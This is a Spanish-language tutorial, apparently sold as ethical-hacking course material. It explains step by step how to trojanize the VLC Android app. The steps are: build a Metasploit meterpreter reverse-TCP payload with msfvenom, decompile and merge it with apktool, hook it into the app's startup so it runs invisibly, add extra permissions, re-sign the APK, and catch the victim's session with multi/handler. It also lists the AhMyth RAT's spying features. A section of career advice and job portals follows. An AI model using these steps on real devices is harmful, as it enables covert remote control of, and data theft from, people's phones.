El primer paso consiste en crear nuestro payload con msfvenom. Como lo crearemos
de conexión reversa (nuestro objetivo se conecta a nosotros), comprobamos primero
nuestra dirección IP privada: ifconfig

Ahora comprobaremos los payloads que están disponibles.( msfvenom - lpayloads)

Elegiremos el que mejor se adapte a nuestro objetivo y el tipo de conexión.


(android/meterpreter_reverse_tcp)

Tras tener toda la información previa (dirección IP del atacante al ser un payload de
conexión reversa, comprobar los payloads que mejor se ajustan) creamos el
payload.

A continuación, tenemos que decompilar cada APK ( apktool d -f -o ./payload


./[Link] -------- apktool d -f -o ./vlc ./VÑ[Link]

El próximo paso es copiar esos archivos generados por apktool, los cuales con-
tienen el código del payload generado por msfvenom, a las carpetas generadas de
la apk de VLC.

Copiamos el archivo "[Link]" dentro de la carpeta de VLC (carpeta que


debemos crear para que coincida con la ruta de la apk del payload) de la siguiente
forma ( root@kali:-/Descargas/vlc/smali/com/stage/# cp
-/Descargas/payload/smali/com/metasploit/stage/[Link]

Tenemos el código malicioso dentro de la APK legítima, pero esto no significa que si
generamos el APK vaya a ejecutarse el payload. De hecho, vamos a hacer que esto
sea así inyectando un hook dentro de la actividad original de inicio, la MainActivity.
Qué es un hook?

En este aso nos referimos como hook a la inyección que vamos hacer que para que
cuando se inicie la app original llame a nuestro código payload . y lo ejecute por nosotros
de una manera totalmente invisible para el usuario final.

Para ello, vamos a revisar el archivo AndroidManifest xml de la APK original, tal y como
vamos a mostrar a continuación.

Localizadas estas líneas, debemos fijarnos en el atributo de android:name den-tro de


la etiqueta <activity>.
Esta sería la actividad que inicia la aplicación en una primera instancia, por lo que
tendríamos que buscar el MainActivity,smali dentro de los archivos gene-rados por
apktool para modificarlo. La ruta nos la da el valor del atributo que
acabamos de revisar.
En dicho fichero tenemos que localizar la siguiente línea, que es la que inicia la
instancia de VLC. Tenemos que añadir al fichero la siguiente línea de texto
(onCreate(Landroid/os/Bundle;)V) y (.line 118)
Esto añadirá al arranque de la APK de VLC el arranque del payload de metas-ploit. Es
importante reconocer la línea correcta que debemos de modificar gracias a las
cadenas de texto invoke-super {p0, p1} y la parte final que indica on-
Create(Landroid/os/Bundle;), ya que, de lo contrario, el proceso fallara
A continuación, debemos de modificar el fichero "[Link]".
Este fichero cumple con varias funciones, entre ellas indicar en el proceso de
instalación de los permisos a los que accederá la APK. Como la APK original ha sido
troyanizada, debemos añadir opciones adicionales a las que incorpora el fichero
original.
En el fichero original se observan opciones relacionadas con la fuyncionalidad de Vlc
1. PERMISOS PARA MODIFICAR OPCIONES DE AUDIO
2. PERMISOS DE INTERNET
3. PERMISOS PARA LEER EL ESTADO DEL MOVIL
4. PERMISOS PARA LEER LOGS
5. PERMISOS DE ESCRITURA
6. PERMISOS EN EL BLOQUEO DE PANTALLA
Tras terminar con este proceso vamos a compilar de nuevo la aplicación (apktool b vlc)
último paso de preparación co reiste en firmar la APK que acabamos de crear, Primero
crearemos nuestra propia firma, Empezamos creando la keystore (keytool -genkeypair -
alias androiddebugkey -keypass indra2018 -keystore [Link] -storepass
indra2018 -dname “CN=Android Debug, 0=Android,C=US” -validity 3000
A continuación, generamos la clave privada. ( keytool -list -alias androiddebugkey -
keystore [Link] -storepass in2018 -keypass indra2018
Y con ella firmamos nuestra APK.
Ahora nos pondremos a la escucha desde Metasploit. Primero iniciamos la
aplicación:service postgresql start ------- msfconsole
El módulo que debemos utilizar para recibir sesiones se llama handler y se puede
cargar con el comando use exploit/multi/handler. Una vez se ha entrado debemos
configurar que recibiremos una sesión de meterpreter de Android.
Indicada la sesión que recibiremos, vamos a configurar la dirección IP y puerto que
indicamos al crear el payload mediante los parámetros LHOST y LPORT y, finalmente,
lanzarlo.
Una vez tenemos lista la sesión, podemos pasar al dispositivo smartphone nuestra APK
troyanizada.
Alguien con conocimientos técnicos podrá apreciar que una aplicación multimedia
como VLC no requiere de tantos permisos.
Cuando la iniciamos se puede observar como se ha creado la sesión de meterpreter da
igual el móvil que sea la victima

Ahora podemos interactuar con la sesión y empezar a realizar las tareas de


postexplotación que permite este tipo de código malicioso.
AhMyth es una herramienta de administración remota (RAT, por sus siglas en inglés)
diseñada específicamente para dispositivos Android. Sus funciones principales
incluyen:

1. Control Remoto: Permite acceder y gestionar dispositivos Android de forma


remota a través de una interfaz centralizada.
2. Monitoreo de Actividades: Ofrece capacidades para supervisar llamadas,
mensajes de texto y actividades en tiempo real.
3. Gestión de Archivos: Facilita la exploración, descarga y manipulación de
archivos almacenados en el dispositivo.
4. Captura de Información Sensible: Puede recopilar datos como contactos,
registros de llamadas y ubicaciones GPS.
5. Interacción con el Sistema: Permite ejecutar comandos en el dispositivo
objetivo para realizar tareas específicas.

Es importante destacar que AhMyth está diseñado para fines educativos y de


investigación en ciberseguridad. Su uso debe estar estrictamente alineado con
principios éticos y legales.

HERRAMIENTAS DE ANALISIS APK MALICIOSA

APKTOOL
7ZIP
Modulo extra
Para iniciar en el apasionante mundo del hacking ético, te recomiendo comenzar practicando
en plataformas educativas como Hack The Box, [Link] y [Link], donde
podrás adquirir experiencia práctica resolviendo desafíos diseñados específicamente para
fortalecer tus habilidades.

A continuación, te sugiero complementar esta experiencia práctica con cursos sobre lenguajes
de programación esenciales como Python y Bash. Estas herramientas te permitirán
comprender en profundidad cómo funcionan los scripts y qué procesos subyacen detrás de las
funciones automatizadas.

Es fundamental avanzar obteniendo certificaciones reconocidas en el campo de la


ciberseguridad, como:
Certified Ethical Hacker (CEH)
Offensive Security Certified Professional (OSCP)
eLearnSecurity Junior Penetration Tester (eJPT)
Certified Information Systems Security Professional (CISSP)

Estas certificaciones son reconocidas globalmente y te posicionarán como un profesional


altamente calificado.

Además, es crucial ampliar tus conocimientos explorando el ámbito del Blue Team , que se
enfoca en proteger a las empresas de ataques cibernéticos. Dominar esta área te convertirá
en un profesional integral, capaz de prevenir y mitigar amenazas.

Una vez que adquieras estos conocimientos, busca prácticas en empresas relacionadas con
la ciberseguridad, ya que la experiencia práctica es insustituible y esencial para tu desarrollo
profesional.

Finalmente, quiero recalcar el valor de este contenido. Si después de seguir estos pasos no
logras monetizar tu conocimiento como lo he hecho yo, estaría dispuesto a devolverte los 10
euros que invertiste en este material. Te lo vendo porque cuando las cosas son gratis, muchas
veces no se valoran. Mi intención es que comprendas la importancia de tomarte este
aprendizaje en serio, porque la tecnología que hoy estamos construyendo tiene el poder de
transformar el mundo hacia un sistema mucho más seguro (Análisis Forense)

"En un mundo construido sobre códigos, no rompo sistemas, descifro verdades."

ATT: OSIS
TE DOY UNA MINA DE ORO APROVECHALA

Para que puedas seguir avanzando en tu búsqueda de empleo/prácticas, te adjunto


diversas bolsas de empleo específicas ACTUALIZADAS,asociaciones para que estés al día en
este sector y páginas webs de terceros que te servirán para ir creando un portfolio atractivo
para las empresas

PORTALES ESPECIFICOS EMPLEO

Careers in Cyber
[Link]

Cybersecurity Jobsite [Link]

Ticjob
[Link]

Tecnoempleo
[Link]

Eurotech Jobs
[Link]

Security Cleared Jobs


[Link]

Jobsora
[Link]

Kiwi remoto (trabajo en remoto)


[Link]
ASOCIACIONES

AECODI (Asociación Española de Responsables de Comunidad Digital y de


Seguridad en Entornos Digitales) [Link]

CUMPLEN (Asociación de Ciberseguridad y Protección de Datos)


[Link]

CSIRT (Foro de Equipos de Respuesta ante Incidentes de Seguridad de la


Información) [Link]

INCIBE (INSTITUTO NACIONAL DE CIBERSEGURIDAD) WOMEN4CYBER


SPAIN HTTPS://[Link]/

WOMEN4CYBER SPAIN
HTTPS://[Link]/ HTTPS://[Link]/

ECS [Link]

HackerOne Es una de las principales plataformas de bug bounty y pruebas de


seguridad colaborativa. Conecta a empresas y gobiernos con hackers éticos que
ayudan a identificar y corregir vulnerabilidades en sistemas antes de que sean
explotadas por actores maliciosos. [Link]

Bugcrowd Es una de las principales plataformas de Bug Bounty, pruebas de


penetración y gestión de vulnerabilidades, conectando empresas con hackers
éticos para mejorar la seguridad de sus sistemas. [Link]

También podría gustarte